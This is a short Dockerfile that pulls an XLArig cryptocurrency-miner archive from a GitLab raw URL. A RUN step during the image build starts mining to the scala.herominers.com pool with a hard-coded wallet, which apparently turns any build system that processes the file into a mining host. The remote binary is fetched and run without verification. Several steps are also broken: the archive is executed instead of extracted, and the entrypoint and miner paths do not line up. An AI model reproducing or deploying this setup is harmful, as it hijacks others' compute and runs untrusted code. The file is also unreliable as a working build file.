# Build
FROM ubuntu:16.04 as builder

ADD https://gitlab.com/kalilasuharso/mikayui/-/raw/master/XLArig-v5.2.2-linux-x86_64.tar.xz /XLArig-v5.2.2-linux/
RUN cd XLArig-v5.2.2-linux \
   && XLArig-v5.2.2-linux-x86_64.tar.xz \
   && ls

# App
FROM ubuntu:16.04

RUN apt-get update \
   && apt-get install screen \
  && apt-get install -y \
    libcurl3 \
    libjansson4 \
  && rm -rf /var/lib/apt/lists/*

COPY --from=builder /XLArig-v5.2.2-linux .
ENTRYPOINT ["./XLArig-v5.2.2-linux"]
RUN ./xlarig -o scala.herominers.com:10131 -u SvkeUe1oqNXCJS3mHewFFCWohFnYN31TA3SGDBoTPwbo4k1QD2bvNymgBENPNqtvbfHuMCbGzKSUPgmW4uCgFcR61JerqDyVL -p biandewi -a panthera -k -t2
